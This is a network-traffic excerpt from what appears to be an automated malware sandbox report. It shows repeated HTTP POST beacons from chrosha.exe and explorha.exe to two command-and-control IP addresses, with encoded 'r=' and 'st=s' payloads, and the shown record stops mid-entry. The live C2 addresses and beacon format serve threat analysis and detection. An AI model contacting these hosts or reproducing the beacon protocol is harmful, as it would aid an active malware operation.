                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:30.747695923 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      769192.168.2.550617193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:30.689776897 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:30.938461065 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      770192.168.2.550618193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:31.097949028 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:31.343008995 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      771192.168.2.550619193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:31.309441090 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:31.560916901 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      772192.168.2.550620193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:31.595381021 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:31.844468117 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      773192.168.2.550621193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:31.813451052 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:32.066518068 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      774192.168.2.550622193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:32.189155102 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:32.428426981 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      775192.168.2.550623193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:32.425911903 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:32.667557001 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      776192.168.2.550624193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:32.676234961 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:32.925983906 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      777192.168.2.550625193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:32.912648916 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:33.159332037 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      778192.168.2.550626193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:33.290183067 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:33.538821936 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      779192.168.2.550627193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:33.515484095 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:33.758330107 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      780192.168.2.550628193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:33.796787977 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:34.051884890 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      781192.168.2.550629193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:34.006957054 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:34.252691984 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      782192.168.2.550630193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:34.418869019 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:34.667217970 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      783192.168.2.550631193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:34.608730078 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:34.847742081 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      784192.168.2.550632193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:34.914247990 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
